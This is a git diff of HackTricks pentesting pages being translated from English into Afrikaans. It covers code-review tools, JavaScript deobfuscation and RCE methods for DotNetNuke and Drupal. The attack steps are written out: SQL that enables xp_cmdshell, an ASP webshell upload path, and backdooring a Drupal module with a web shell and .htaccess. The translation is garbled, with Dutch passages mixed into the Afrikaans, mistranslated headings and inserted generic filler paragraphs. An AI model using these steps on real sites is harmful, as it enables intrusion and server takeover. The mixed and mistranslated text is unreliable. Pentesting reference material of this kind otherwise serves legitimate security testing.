@@ -354,9 +335,20 @@ https://github.com/0xd4d/dnSpy
 # .NET compilation
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe test.cs
 ```
-
 ## RUST
 
+RUST is 'n veilige, betroubare en hoë prestasie programmeertaal wat geskik is vir die ontwikkeling van betroubare en effektiewe sagteware. Dit is ontwerp om geheueveiligheid, geloopstydprestasie en geloopstydveiligheid te verseker. RUST maak gebruik van 'n streng statiese tipe-sisteem en 'n eienaar-gebaseerde geheuebestuurmodel om geheuelekke en data-rasse te voorkom.
+
+RUST bied 'n aantal kenmerke wat dit 'n gewilde keuse maak vir die ontwikkeling van veilige sagteware. Dit sluit in:
+
+- **Nul-koste abstraksies**: RUST maak dit moontlik om hoëvlak abstraksies te gebruik sonder om enige merkbare impak op die uitvoeringstyd te hê nie.
+- **Geheueveiligheid**: RUST se streng statiese tipe-sisteem en eienaar-gebaseerde geheuebestuurmodel help om geheuelekke en data-rasse te voorkom.
+- **Thread-veiligheid**: RUST maak dit maklik om veilige, geloopstydveilige veelvoudige drade te skryf sonder om handmatige sinkronisasie te gebruik.
+- **Concurrency**: RUST bied 'n stelsel vir veilige en effektiewe gelyktydige programmering.
+- **Betroubaarheid**: RUST se statiese tipe-sisteem en streng kompilering help om foute vroeg in die ontwikkelingsproses op te spoor en te voorkom.
+- **Prestasie**: RUST is ontwerp om hoë prestasie te lewer sonder om in te boet aan veiligheid of abstraksievlak.
+
+RUST het 'n aktiewe gemeenskap en 'n ryk ekosisteem van biblioteke en gereedskap wat die ontwikkeling van sagteware vergemaklik. Dit word algemeen gebruik vir die ontwikkeling van stelselsagteware, netwerkprotokolle, bedryfstelsels en ander kritieke toepassings.
 ```bash
 # Install
 cargo install cargo-audit
@@ -367,9 +359,21 @@ cargo audit
 #Update the Advisory Database
 cargo audit fetch
 ```
-
 ## Java
 
+Java is 'n populaire programmeertaal wat gebruik word vir die ontwikkeling van verskeie toepassings, insluitend webtoepassings. Dit is 'n objekgeoriënteerde taal wat platformonafhanklik is, wat beteken dat dit op verskillende bedryfstelsels kan hardloop sonder om die kode te verander. Dit maak gebruik van 'n virtuele masjien (VM) om die kode uit te voer.
+
+### Java-kodehersieningsgereedskap
+
+Hier is 'n paar gereedskap wat gebruik kan word vir die hersiening van Java-kode:
+
+- **Checkstyle**: 'n gereedskap wat gebruik word om die kode te hersien en te verseker dat dit voldoen aan 'n spesifieke kodekonvensie.
+- **FindBugs**: 'n statiese analisewerktuig wat gebruik word om potensiële programmeerfoute in Java-kode te identifiseer.
+- **PMD**: 'n gereedskap wat gebruik word om kode te analiseer en potensiële probleme en swak praktyke te identifiseer.
+- **SonarQube**: 'n platform wat gebruik word vir die kontinue hersiening van kode, met 'n fokus op die identifisering van kwessies en die bevordering van kodekwaliteit.
+- **SpotBugs**: 'n opvolger van FindBugs wat gebruik word om potensiële programmeerfoute in Java-kode te identifiseer.
+
+Dit is slegs 'n paar voorbeelde van gereedskap wat beskikbaar is vir die hersiening van Java-kode. Dit is belangrik om die regte gereedskap te kies wat aan jou spesifieke behoeftes voldoen.
 ```bash
 # JD-Gui
 https://github.com/java-decompiler/jd-gui
@@ -380,28 +384,25 @@ mkdir META-INF
 echo "Main-Class: test" > META-INF/MANIFEST.MF
 jar cmvf META-INF/MANIFEST.MF test.jar test.class
 ```
-
-| Task            | Command                                                   |
+| Taak            | Opdrag                                                     |
 | --------------- | --------------------------------------------------------- |
-| Execute Jar     | java -jar \[jar]                                          |
-| Unzip Jar       | unzip -d \[output directory] \[jar]                       |
-| Create Jar      | jar -cmf META-INF/MANIFEST.MF \[output jar] \*            |
-| Base64 SHA256   | sha256sum \[file] \| cut -d' ' -f1 \| xxd -r -p \| base64 |
-| Remove Signing  | rm META-INF/_.SF META-INF/_.RSA META-INF/\*.DSA           |
-| Delete from Jar | zip -d \[jar] \[file to remove]                           |
-| Decompile class | procyon -o . \[path to class]                             |
-| Decompile Jar   | procyon -jar \[jar] -o \[output directory]                |
-| Compile class   | javac \[path to .java file]                               |
-
-## Go
+| Voer Jar uit    | java -jar \[jar]                                          |
+| Ontplooi Jar    | unzip -d \[uitvoer gids] \[jar]                           |
+| Skep Jar        | jar -cmf META-INF/MANIFEST.MF \[uitvoer jar] \*            |
+| Base64 SHA256   | sha256sum \[lêer] \| cut -d' ' -f1 \| xxd -r -p \| base64 |
+| Verwyder Ondertekening | rm META-INF/_.SF META-INF/_.RSA META-INF/\*.DSA           |
+| Verwyder uit Jar | zip -d \[jar] \[lêer om te verwyder]                      |
+| Ontsleutel klas | procyon -o . \[pad na klas]                               |
+| Ontsleutel Jar  | procyon -jar \[jar] -o \[uitvoer gids]                    |
+| Kompileer klas  | javac \[pad na .java lêer]                               |
 
+## Gaan
 ```bash
 https://github.com/securego/gosec
 ```
-
 ## PHP
 
-[Psalm](https://phpmagazine.net/2018/12/find-errors-in-your-php-applications-with-psalm.html) and [PHPStan](https://phpmagazine.net/2020/09/phpstan-pro-edition-launched.html).
+[Psalm](https://phpmagazine.net/2018/12/find-errors-in-your-php-applications-with-psalm.html) en [PHPStan](https://phpmagazine.net/2020/09/phpstan-pro-edition-launched.html).
 
 ### Wordpress Plugins
 
@@ -413,16 +414,16 @@ https://github.com/securego/gosec
 
 ## JavaScript
 
-### Discovery
+### Ontdekking
 
 1. Burp:
-   * Spider and discover content
-   * Sitemap > filter
-   * Sitemap > right-click domain > Engagement tools > Find scripts
+* Spider en ontdek inhoud
+* Sitemap > filter
+* Sitemap > klik met rechtermuisknop op domein > Engagement tools > Vind scripts
 2. [WaybackURLs](https://github.com/tomnomnom/waybackurls):
-   * `waybackurls  |grep -i "\.js" |sort -u`
+* `waybackurls  |grep -i "\.js" |sort -u`
 
-### Static Analysis
+### Statische Analyse
 
 #### Unminimize/Beautify/Prettify
 
@@ -431,27 +432,27 @@ https://github.com/securego/gosec
 
 #### Deobfuscate/Unpack
 
-**Note**: It may not be possible to fully deobfuscate.
+**Opmerking**: Dit is mogelijk niet volledig deobfuscateerbaar.
 
-1. Find and use .map files:
-   * If the .map files are exposed, they can be used to easily deobfuscate.
-   * Commonly, foo.js.map maps to foo.js. Manually look for them.
-   * Use [JS Miner](https://github.com/PortSwigger/js-miner) to look for them.
-   * Ensure active scan is conducted.
-   * Read '[Tips/Notes](https://github.com/minamo7sen/burp-JS-Miner/wiki#tips--notes)'
-   * If found, use [Maximize](https://www.npmjs.com/package/maximize) to deobfuscate.
-2. Without .map files, try JSnice:
-   * References: http://jsnice.org/ & https://www.npmjs.com/package/jsnice
-   * Tips:
-     * If using jsnice.org, click on the options button next to the "Nicify JavaScript" button, and de-select "Infer types" to reduce cluttering the code with comments.
-     * Ensure you do not leave any empty lines before the script, as it may affect the deobfuscation process and give inaccurate results.
-3. Use console.log();
-   * Find the return value at the end and change it to `console.log();` so the deobfuscated js is printed instead of being executing.
-   * Then, paste the modified (and still obfuscated) js into https://jsconsole.com/ to see the deobfuscated js logged to the console.
-   * Finally, paste the deobfuscated output into https://prettier.io/playground/ to beautify it for analysis.
-   * **Note**: If you are still seeing packed (but different) js, it may be recursively packed. Repeat the process.
+1. Vind en gebruik .map-bestanden:
+* Als de .map-bestanden blootgesteld zijn, kunnen ze gemakkelijk worden gebruikt om te deobfuscate.
+* Vaak wordt foo.js.map gemapt naar foo.js. Zoek er handmatig naar.
+* Gebruik [JS Miner](https://github.com/PortSwigger/js-miner) om ernaar te zoeken.
+* Zorg ervoor dat er een actieve scan wordt uitgevoerd.
+* Lees '[Tips/Notes](https://github.com/minamo7sen/burp-JS-Miner/wiki#tips--notes)'
+* Als ze gevonden zijn, gebruik [Maximize](https://www.npmjs.com/package/maximize) om te deobfuscate.
+2. Zonder .map-bestanden, probeer JSnice:
+* Referenties: http://jsnice.org/ & https://www.npmjs.com/package/jsnice
+* Tips:
+* Als je jsnice.org gebruikt, klik dan op de optieknop naast de "Nicify JavaScript" knop en deselecteer "Infer types" om de code niet te overladen met opmerkingen.
+* Zorg ervoor dat je geen lege regels achterlaat voor het script, omdat dit het deobfuscation proces kan beïnvloeden en onnauwkeurige resultaten kan geven.
+3. Gebruik console.log();
+* Vind de retourwaarde aan het einde en verander deze in `console.log();` zodat de deobfuscated js wordt afgedrukt in plaats van uitgevoerd.
+* Plak vervolgens de aangepaste (en nog steeds geobfusceerde) js in https://jsconsole.com/ om de deobfuscated js in de console te zien.
+* Plak tenslotte de deobfuscated output in https://prettier.io/playground/ om het te verfraaien voor analyse.
+* **Opmerking**: Als je nog steeds verpakte (maar verschillende) js ziet, kan het recursief verpakt zijn. Herhaal het proces.
 
-References
+Referenties
 
 * https://www.youtube.com/watch?v=\_v8r\_t4v6hQ
 * https://blog.nvisium.com/angular-for-pentesters-part-1
@@ -461,7 +462,7 @@ Tools
 
 * https://portswigger.net/burp/documentation/desktop/tools/dom-invader
 
-#### Less Used References
+#### Minder Gebruikte Referenties
 
 * https://cyberchef.org/
 * https://olajs.com/javascript-prettifier
@@ -470,14 +471,14 @@ Tools
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Andere manieren om HackTricks te ondersteunen:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Als je je **bedrijf geadverteerd wilt zien in HackTricks** of **HackTricks in PDF wilt downloaden**, bekijk dan de [**ABONNEMENTSPLANNEN**](https://github.com/sponsors/carlospolop)!
+* Koop de [**officiële PEASS & HackTricks merchandise**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Doe mee aan de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
index 69dba8605..58d560617 100644
--- a/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
+++ b/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md
@@ -2,63 +2,59 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks-repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

 
 ## DotNetNuke (DNN)
 
-If you enter as **administrator** in DNN it's easy to obtain RCE.
+As jy as **administrateur** in DNN intree, is dit maklik om RCE te verkry.
 
 ## RCE
 
 ### Via SQL
 
-A SQL console is accessible under the **`Settings`** page where you can enable **`xp_cmdshell`** and **run operating system commands**.
-
-Use these lines to enable **`xp_cmdshell`**:
+'n SQL-konsole is toeganklik onder die **`Settings`**-bladsy waar jy **`xp_cmdshell`** kan aktiveer en **bedryfstelselopdragte kan uitvoer**.
 
+Gebruik hierdie lyne om **`xp_cmdshell`** te aktiveer:
 ```sql
 EXEC sp_configure 'show advanced options', '1'
 RECONFIGURE
-EXEC sp_configure 'xp_cmdshell', '1' 
+EXEC sp_configure 'xp_cmdshell', '1'
 RECONFIGURE
 ```
+En druk **"Voer Skrip"** om daardie sQL sinne uit te voer.
 
-And press **"Run Script"** to run that sQL sentences.
-
-Then, use something like the following to run OS commands:
-
+Gebruik dan iets soos die volgende om OS-opdragte uit te voer:
 ```sql
 xp_cmdshell 'whoami'
 ```
+### Via ASP-webshell
 
-### Via ASP webshell
+In `Instellings -> Sekuriteit -> Meer -> Meer Sekuriteitsinstellings` kan jy **nuwe toegelate uitbreidings** byvoeg onder `Toelaatbare Lêeruitbreidings`, en dan die `Stoor`-knoppie klik.
 
-In `Settings -> Security -> More -> More Security Settings` you can **add new allowed extensions** under `Allowable File Extensions`, and then clicking the `Save` button.
+Voeg **`asp`** of **`aspx`** by en laai dan 'n **asp-webshell** op met die naam `shell.asp` byvoorbeeld in **`/admin/lêerbestuur`**.
 
-Add **`asp`** or **`aspx`** and then in **`/admin/file-management`** upload an **asp webshell** called `shell.asp` for example.
+Toegang tot **`/Portals/0/shell.asp`** om toegang tot jou webshell te verkry.
 
-Then access to **`/Portals/0/shell.asp`** to access your webshell.
+### Bevoorregte Eskalasie
 
-### Privilege Escalation
-
-You can **escalate privileges** using the **Potatoes** or **PrintSpoofer** for example. 
+Jy kan **bevoorregte eskalasie** doen deur die gebruik van **Potatoes** of **PrintSpoofer** byvoorbeeld. 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Werk jy vir 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
 
 

diff --git a/network-services-pentesting/pentesting-web/drupal.md b/network-services-pentesting/pentesting-web/drupal.md
index 9e5bf1f00..a7a361c4b 100644
--- a/network-services-pentesting/pentesting-web/drupal.md
+++ b/network-services-pentesting/pentesting-web/drupal.md
@@ -2,87 +2,80 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
-## Discovery
-
-* Check **meta**
+## Ontdekking
 
+* Kontroleer **meta**
 ```bash
 curl https://www.drupal.org/ | grep 'content="Drupal'
 ```
-
-* **Node**: Drupal **indexes its content using nodes**. A node can **hold anything** such as a blog post, poll, article, etc. The page URIs are usually of the form `/node/`.
-
+* **Node**: Drupal **indekseer sy inhoud met behulp van nodes**. 'n Node kan **enige iets bevat**, soos 'n blogpos, opiniepeiling, artikel, ens. Die bladsy-URI's is gewoonlik in die vorm `/node/`.
 ```bash
 curl drupal-site.com/node/1
 ```
+## Opname
 
-## Enumeration
+Drupal ondersteun standaard **drie tipes gebruikers**:
 
-Drupal supports **three types of users** by default:
+1. **`Administrateur`**: Hierdie gebruiker het volledige beheer oor die Drupal-webwerf.
+2. **`Geverifieerde Gebruiker`**: Hierdie gebruikers kan op die webwerf inlog en operasies uitvoer soos die byvoeg en wysig van artikels gebaseer op hul toestemmings.
+3. **`Anoniem`**: Alle webwerfbesoekers word as anoniem aangedui. Standaard word hierdie gebruikers slegs toegelaat om plasings te lees.
 
-1. **`Administrator`**: This user has complete control over the Drupal website.
-2. **`Authenticated User`**: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
-3. **`Anonymous`**: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.
-
-### Version
-
-* Check `/CHANGELOG.txt`
+### Weergawe
 
+* Kontroleer `/CHANGELOG.txt`
 ```bash
 curl -s http://drupal-site.local/CHANGELOG.txt | grep -m2 ""
 
 Drupal 7.57, 2018-02-21
 ```
-
 {% hint style="info" %}
-Newer installs of Drupal by default block access to the `CHANGELOG.txt` and `README.txt` files.
+Nuwer installasies van Drupal blokkeer standaard toegang tot die `CHANGELOG.txt` en `README.txt` lêers.
 {% endhint %}
 
-### Username enumeration
+### Gebruikersnaam opsomming
 
-#### Register
+#### Registreer
 
-In _/user/register_ just try to create a username and if the name is already taken it will be notified:
+In _/user/register_ probeer net om 'n gebruikersnaam te skep en as die naam reeds geneem is, sal dit aangedui word:
 
 ![](<../../.gitbook/assets/image (254).png>)
 
-#### Request new password
+#### Versoek nuwe wagwoord
 
-If you request a new password for an existing username:
+As jy 'n nuwe wagwoord versoek vir 'n bestaande gebruikersnaam:
 
 ![](<../../.gitbook/assets/image (255).png>)
 
-If you request a new password for a non-existent username:
+As jy 'n nuwe wagwoord versoek vir 'n nie-bestaande gebruikersnaam:
 
 ![](<../../.gitbook/assets/image (256).png>)
 
-### Get number of users
+### Kry aantal gebruikers
 
-Accessing _/user/\_ you can see the number of existing users, in this case is 2 as _/users/3_ returns a not found error:
+Deur toegang te verkry tot _/user/\_ kan jy die aantal bestaande gebruikers sien, in hierdie geval is dit 2 aangesien _/users/3_ 'n nie gevind fout teruggee:
 
 ![](<../../.gitbook/assets/image (257).png>)
 
 ![](<../../.gitbook/assets/image (227) (1) (1).png>)
 
-### Hidden pages
+### Versteekte bladsye
 
-**Fuzz `/node/$` where `$` is a number** (from 1 to 500 for example).\
-You could find **hidden pages** (test, dev) which are not referenced by the search engines.
-
-#### Installed modules info
+**Fuzz `/node/$` waar `$` 'n nommer is** (van 1 tot 500 byvoorbeeld).\
+Jy kan **versteekte bladsye** (toets, ontwikkeling) vind wat nie deur soekmasjiene verwys word nie.
 
+#### Geïnstalleerde module-inligting
 ```bash
 #From https://twitter.com/intigriti/status/1439192489093644292/photo/1
 #Get info on installed modules
@@ -92,113 +85,144 @@ curl https://example.com/core/core.services.yml
 # Download content from files exposed in the previous step
 curl https://example.com/config/sync/swiftmailer.transport.yml
 ```
+### Outomaties
 
-### Automatic
+#### Drupal
 
+Drupal is 'n gratis en oopbron-inhoudbestuurstelsel (CMS) wat gebruik word om webwerwe te bou en te bestuur. Dit is 'n baie gewilde CMS wat deur baie webwerwe regoor die wêreld gebruik word. As 'n pentester is dit belangrik om te weet hoe om Drupal-webwerwe te toets vir moontlike kwesbaarhede.
+
+#### Drupal-weergawes
+
+Dit is belangrik om die weergawe van Drupal wat op 'n webwerf gebruik word, te bepaal, aangesien sekere weergawes kwesbaarhede kan hê wat in ander weergawes opgelos is. Dit kan gedoen word deur na spesifieke kenmerke of bestande te soek wat uniek is vir 'n spesifieke weergawe van Drupal.
+
+#### Drupal-kwesbaarhede
+
+Daar is verskeie kwesbaarhede wat in Drupal-webwerwe kan voorkom. Dit sluit in SQL-injeksie, kruissite-skripsie (XSS), toegangsbeheerprobleme en meer. Dit is belangrik om hierdie kwesbaarhede te identifiseer en te verstaan hoe om dit uit te buit.
+
+#### Drupal-modules
+
+Drupal maak gebruik van modules om funksionaliteit aan webwerwe toe te voeg. Sommige modules kan kwesbaarhede hê wat uitgebuit kan word. Dit is belangrik om die modules wat op 'n Drupal-webwerf geïnstalleer is, te identifiseer en te ondersoek vir moontlike kwesbaarhede.
+
+#### Drupal-temas
+
+Temas word gebruik om die voorkoms van 'n Drupal-webwerf te bepaal. Sommige temas kan sekuriteitskwesbaarhede hê wat uitgebuit kan word. Dit is belangrik om die temas wat op 'n Drupal-webwerf gebruik word, te identifiseer en te ondersoek vir moontlike kwesbaarhede.
+
+#### Drupal-bronne
+
+Daar is baie bronne beskikbaar wat inligting en hulpmiddels bied vir die pentesting van Drupal-webwerwe. Dit sluit in dokumentasie, gemeenskapsforums, veiligheidskennisbasisse en meer. Dit is belangrik om hierdie bronne te raadpleeg om 'n beter begrip van Drupal en die moontlike kwesbaarhede te verkry.
+
+#### Drupal-pentesting-hulpmiddels
+
+Daar is verskeie hulpmiddels beskikbaar wat spesifiek ontwerp is vir die pentesting van Drupal-webwerwe. Hierdie hulpmiddels kan gebruik word om kwesbaarhede te identifiseer, toetsdata te manipuleer en toegang tot die webwerf te verkry. Dit is belangrik om bekend te wees met hierdie hulpmiddels en hoe om dit effektief te gebruik.
 ```bash
 droopescan scan drupal -u http://drupal-site.local
 ```
-
 ## RCE
 
-### With PHP Filter Module
+### Met die PHP Filter Module
 
 {% hint style="warning" %}
-In older versions of Drupal **(before version 8)**, it was possible to log in as an admin and **enable the `PHP filter` module**, which "Allows embedded PHP code/snippets to be evaluated."
+In ouer weergawes van Drupal **(voor weergawe 8)**, was dit moontlik om as 'n admin in te teken en die `PHP filter` module te **aktiveer**, wat "Ingeslote PHP-kode/snippets toelaat om geëvalueer te word."
 {% endhint %}
 
-You need the **plugin php to be installed** (check it accessing to _/modules/php_ and if it returns a **403** then, **exists**, if **not found**, then the **plugin php isn't installed**)
+Jy benodig die **plugin php om geïnstalleer te wees** (kontroleer dit deur na _/modules/php_ te gaan en as dit 'n **403** teruggee, **bestaan dit**, as dit **nie gevind** word nie, is die **plugin php nie geïnstalleer** nie)
 
-Go to _Modules_ -> (**Check**) _PHP Filter_ -> _Save configuration_
+Gaan na _Modules_ -> (**Kontroleer**) _PHP Filter_ -> _Stoor konfigurasie_
 
 ![](<../../.gitbook/assets/image (247) (1).png>)
 
-Then click on _Add content_ -> Select _Basic Page_ or _Article -_> Write _php shellcode on the body_ -> Select _PHP code_ in _Text format_ -> Select _Preview_
+Klik dan op _Voeg inhoud by_ -> Kies _Basiese bladsy_ of _Artikel_ -> Skryf _php shellcode in die liggaam_ -> Kies _PHP-kode_ in _Teks formaat_ -> Kies _Voorbeeld_
 
 ![](<../../.gitbook/assets/image (253) (1).png>)
 
-Finally just access the newly created node:
-
+Laastens, gaan net na die nuut geskepte node:
 ```bash
 curl http://drupal-site.local/node/3
 ```
+### Installeer PHP Filter Module
 
-### Install PHP Filter Module
+Vanaf weergawe **8 en hoër, is die** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module nie standaard geïnstalleer nie**. Om van hierdie funksionaliteit gebruik te maak, moet ons die module self **installeer**.
 
-From version **8 onwards, the** [**PHP Filter**](https://www.drupal.org/project/php/releases/8.x-1.1) **module is not installed by default**. To leverage this functionality, we would have to **install the module ourselves**.
-
-1. Download the most recent version of the module from the Drupal website.
-   1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
-2. Once downloaded go to **`Administration`** > **`Reports`** > **`Available updates`**.
-3. Click on **`Browse`**`,` select the file from the directory we downloaded it to, and then click **`Install`**.
-4. Once the module is installed, we can click on **`Content`** and **create a new basic page**, similar to how we did in the Drupal 7 example. Again, be sure to **select `PHP code` from the `Text format` dropdown**.
+1. Laai die mees onlangse weergawe van die module af van die Drupal-webwerf.
+1. wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
+2. Nadat dit afgelaai is, gaan na **`Administrasie`** > **`Verslae`** > **`Beskikbare opdaterings`**.
+3. Klik op **`Deursoek`**`,` kies die lêer uit die gids waar ons dit afgelaai het, en klik dan op **`Installeer`**.
+4. Nadat die module geïnstalleer is, kan ons op **`Inhoud`** klik en **'n nuwe basiese bladsy skep**, soortgelyk aan hoe ons dit in die Drupal 7-voorbeeld gedoen het. Maak weer seker om **`PHP-kode` te kies uit die `Teks formaat` keuslys**.
 
 ### Backdoored Module
 
-A backdoored module can be created by **adding a shell to an existing module**. Modules can be found on the drupal.org website. Let's pick a module such as [CAPTCHA](https://www.drupal.org/project/captcha). Scroll down and copy the link for the tar.gz [archive](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
-
-* Download the archive and extract its contents.
+'n Backdoored-module kan geskep word deur **'n skulpunt by 'n bestaande module te voeg**. Modules kan op die drupal.org-webwerf gevind word. Laat ons 'n module soos [CAPTCHA](https://www.drupal.org/project/captcha) kies. Rol af en kopieer die skakel vir die tar.gz [argief](https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz).
 
+* Laai die argief af en onttrek die inhoud daarvan.
 ```
 wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
 tar xvf captcha-8.x-1.2.tar.gz
 ```
-
-* Create a **PHP web shell** with the contents:
-
+* Skep 'n **PHP-webdop** met die inhoud:
 ```php
 
 ```
-
-* Next, we need to create a **`.htaccess`** file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the **`/modules`** folder.
-
+* Volgende, moet ons 'n **`.htaccess`** lêer skep om onsself toegang tot die gids te gee. Dit is nodig omdat Drupal direkte toegang tot die **`/modules`** gids weier.
 ```html
 
 RewriteEngine On
 RewriteBase /
 
 ```
-
-* The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.
-
